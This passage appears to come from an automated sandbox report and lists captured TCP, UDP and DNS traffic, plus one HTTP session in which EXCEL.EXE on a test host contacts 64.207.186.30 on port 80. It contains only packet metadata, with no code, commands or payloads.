Apr 12, 2021 17:12:29.805515051 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805521011 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805543900 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805543900 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805560112 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805577040 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805591106 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805593014 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805613995 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805625916 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805632114 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805644989 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805658102 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805658102 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805675030 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805691004 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805701017 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805706978 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805722952 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805738926 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805751085 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805753946 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805778980 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805808067 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.934176922 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.934207916 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.934220076 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.934232950 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.934338093 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.934376955 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.934391022 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.934431076 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.934470892 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.935045004 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935061932 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935079098 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935096025 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935107946 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.935115099 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935132980 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935149908 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935162067 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.935187101 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935203075 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935209990 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.935219049 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935235023 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935240030 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.935250998 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935262918 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.935266972 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935282946 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935303926 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935305119 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.935321093 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.935348034 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.935372114 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936494112 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936517000 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936531067 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936547041 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936563015 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936579943 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936598063 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936613083 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936615944 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936631918 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936652899 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936661005 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936669111 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936685085 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936700106 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936702013 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936716080 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936731100 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936734915 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936747074 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936758041 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936763048 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936780930 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936794043 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936798096 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936814070 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936827898 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936829090 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936846018 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936858892 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936861038 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936876059 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936891079 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936892986 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936906099 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.936922073 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.936953068 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:14:13.676525116 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:14:13.807547092 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:14:13.807642937 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 12, 2021 17:12:10.166270971 CEST | 60985 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:10.235234022 CEST | 53 | 60985 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:10.572501898 CEST | 50200 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:10.623192072 CEST | 53 | 50200 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:10.733810902 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:10.782320976 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:11.487895012 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:11.547650099 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:12.651062012 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:12.701529980 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:13.530662060 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:13.583457947 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:13.958421946 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:14.017302036 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:15.152190924 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:15.200813055 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:16.672051907 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:16.720828056 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:22.697266102 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:22.749782085 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:23.718422890 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:23.776175022 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:24.196566105 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:24.269213915 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:24.703171968 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:24.751795053 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:25.206665039 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:25.264100075 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:26.223649025 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:26.280659914 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:28.237773895 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:28.308604002 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:28.505542040 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:28.568959951 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:28.629479885 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:28.651699066 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:32.346003056 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:32.403481007 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:35.646430969 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:35.698082924 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:38.445791006 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:38.508009911 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:39.241060019 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:39.289609909 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:40.090028048 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:40.141598940 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:40.962084055 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:41.013605118 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:42.102891922 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:42.151520967 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:43.337145090 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:43.385710955 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:44.546957970 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:44.595709085 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:45.138573885 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:45.200107098 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:45.863009930 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:45.916146040 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:47.034605026 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:47.083312035 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:48.181421041 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:48.235048056 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:13:01.141535044 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:13:01.203010082 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:13:05.354763031 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:13:05.403516054 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:13:34.520791054 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:13:34.570939064 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:13:38.405123949 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:13:38.466347933 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:26.532181025 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:26.596822023 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:27.531255960 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:27.553838968 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:27.607048035 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:27.627260923 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:28.253304005 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:28.315382957 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:28.810343981 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:28.889751911 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:29.552643061 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:29.604259968 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:30.134917021 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:30.192377090 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:30.652394056 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:30.709589005 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:31.627110004 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:31.685026884 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:32.329749107 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:32.388941050 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 12, 2021 17:12:10.166270971 CEST | 192.168.2.3 | 8.8.8.8 | 0xda23 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 12, 2021 17:12:28.505542040 CEST | 192.168.2.3 | 8.8.8.8 | 0xd09 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 12, 2021 17:12:10.235234022 CEST | 8.8.8.8 | 192.168.2.3 | 0xda23 | No error (0) | authgfx.msa.akadns6.net | CNAME (Canonical name) | IN (0x0001) | ||
Apr 12, 2021 17:12:28.651699066 CEST | 8.8.8.8 | 192.168.2.3 | 0xd09 | No error (0) | 64.207.186.30 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49714 | 64.207.186.30 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 12, 2021 17:12:28.785401106 CEST | 826 | OUT | |
Apr 12, 2021 17:12:29.014661074 CEST | 979 | IN |